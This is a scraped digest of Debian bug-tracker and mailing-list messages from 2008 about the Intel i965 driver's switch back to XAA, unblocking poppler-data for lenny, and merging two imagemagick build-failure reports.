LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash
Bug#451791: closed by Julien Cristau [EMAIL PROTECTED] (Bug#451791: fixed in xserver-xorg-video-intel 2:2.3.2-2+lenny3)
[ Brice Goglin ] * Add 02_xaa_by_default_on_i965.diff to switch back to XAA on i965 by default to avoid many rendering problems, closes: #451791. Interestingly, I've never been hit by these rendering problems with EXA, but I don't exactly have a 965G, but a 965GM. But the switch back to XAA seems to apply to any 965... Mike
Bug#451791: closed by Julien Cristau [EMAIL PROTECTED] (Bug#451791: fixed in xserver-xorg-video-intel 2:2.3.2-2+lenny3)
On Wed, Aug 27, 2008 at 19:25:17 +0200, Mike Hommey wrote: [ Brice Goglin ] * Add 02_xaa_by_default_on_i965.diff to switch back to XAA on i965 by default to avoid many rendering problems, closes: #451791. Interestingly, I've never been hit by these rendering problems with EXA, but I don't exactly have a 965G, but a 965GM. But the switch back to XAA seems to apply to any 965... The rendering problems with EXA were reported by people with pretty much every 965 variant, and we have no known good version. Upstream was never able to reproduce, so at this point this (or forcing ExaNoComposite by default) was the only option left. Cheers, Julien
Bug#481134: Please hint poppler-data for lenny inclusion
Hideki Yamane wrote: On Sun, 24 Aug 2008 19:45:13 +0200 Luk Claes [EMAIL PROTECTED] wrote: unblocked Great thanks Luk! But, verrry sooorry, I've updated this poppler-data package before read this mail... changelog is below, 1 bug fix and trivial changes. poppler-data (0.2.0-2) unstable; urgency=low * debian/control - add DM-Upload-Allowed: yes, because I'm DM :) - fix poppler-data should suggest libpoppler3 (Closes: #496268) - change Priority: optional from extra, same as cmap-adobe-* - add some descriptions for cmap-adobe-* users so, please unblock this again, please... I am terribly sorry about the inconvenience. unblocked Cheers Luk
Processed: Re: Bug#496818: imagemagick 7:6.4.3.2.dfsg1-1(amd64/experimental): FTBFS: make[1]: *** No rule to make target `j'. Stop
Processing commands for [EMAIL PROTECTED]: forcemerge 496212 496818 Bug#496212: imagemagick_7:6.4.3.2.dfsg1-1(ia64/experimental): FTBFS: No rule to make target `j'. Stop. Bug#496818: imagemagick 7:6.4.3.2.dfsg1-1(amd64/experimental): FTBFS: make[1]: *** No rule to make target `j'. Stop Forcibly Merged 496212 496818. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database)